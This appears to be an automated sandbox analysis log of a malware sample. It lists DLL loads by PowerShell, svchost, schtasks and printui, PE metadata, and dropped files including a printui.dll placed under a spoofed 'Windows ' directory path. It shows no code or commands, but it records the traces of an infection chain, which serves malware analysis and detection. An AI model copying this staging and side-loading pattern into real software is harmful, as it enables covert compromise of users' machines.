Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wbemcomn.dll
Source: C:\Windows \System32\printui.exe, Section loaded: uxtheme.dll
Source: C:\Windows \System32\printui.exe, Section loaded: printui.dll
Source: C:\Windows \System32\printui.exe, Section loaded: cryptbase.dll
Source: C:\Windows\System32\timeout.exe, Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wbemcomn.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: dxgi.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: libcurl.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: libpq.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: libssl-3-x64.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: libcrypto-3-x64.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: libintl-9.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: secur32.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: vcruntime140.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: libcrypto-3-x64.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: vcruntime140.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: zlib1.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: vcruntime140.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: libwinpthread-1.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: libiconv-2.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: vcruntime140.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe, Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe, Section loaded: apphelp.dll
Source: C:\Windows\System32\console_zero.exe, Section loaded: apphelp.dll
Source: C:\Windows\System32\console_zero.exe, Section loaded: libcurl.dll
Source: C:\Windows\System32\console_zero.exe, Section loaded: zlib1.dll
Source: C:\Windows\System32\console_zero.exe, Section loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exe, Section loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe, Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\timeout.exe, Section loaded: version.dll
Source: C:\Windows\System32\schtasks.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe, Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe, Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wbemcomn.dll
Source: C:\Windows\System32\console_zero.exe, Section loaded: libcurl.dll
Source: C:\Windows\System32\console_zero.exe, Section loaded: zlib1.dll
Source: C:\Windows\System32\console_zero.exe, Section loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe, Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe, Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe, Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\crypti.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Ld0f3NDosJ.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Ld0f3NDosJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Ld0f3NDosJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Ld0f3NDosJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Ld0f3NDosJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Ld0f3NDosJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Ld0f3NDosJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Ld0f3NDosJ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000003B.00000002.2613047508.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: vcruntime140d.amd64.pdb source: pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: vcruntime140d.amd64.pdb,,, source: pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363092235.00007FFDA553F000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000003B.00000002.2612916762.00007FFDA553F000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362305807.00007FFD93B8B000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363092235.00007FFDA553F000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000003B.00000002.2612916762.00007FFDA553F000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: ucrtbased.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: PrintUI.pdb source: usvcinsta64.exe, 00000018.00000003.2501497770.0000025D7065E000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 00000028.00000002.2603343739.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp, printui.exe, 00000028.00000000.2502474138.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: PrintUI.pdbGCTL source: usvcinsta64.exe, 00000018.00000003.2501497770.0000025D7065E000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 00000028.00000002.2603343739.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp, printui.exe, 00000028.00000000.2502474138.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp
Source: Ld0f3NDosJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Ld0f3NDosJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Ld0f3NDosJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Ld0f3NDosJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Ld0f3NDosJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55BB470 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,LoadLibraryW,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,QueryPerformanceFrequency,53_2_00007FFDA55BB470
Source: Ld0f3NDosJ.exeStatic PE information: section name: .fptable
Source: hardsvcupdt[1].exe.3.drStatic PE information: section name: .fptable
Source: pyld64.exe.3.drStatic PE information: section name: .fptable
Source: usvcinsta64.exe.14.drStatic PE information: section name: .fptable
Source: printui.dll.24.drStatic PE information: section name: .fptable
Source: libwinpthread-1.dll.40.drStatic PE information: section name: .xdata
Source: console_zero.exe.40.drStatic PE information: section name: .fptable
Source: vcruntime140d.dll.40.drStatic PE information: section name: _RDATA
Source: libiconv-2.dll.40.drStatic PE information: section name: .xdata
Source: libiconv-2.dll.40.drStatic PE information: section name: /4
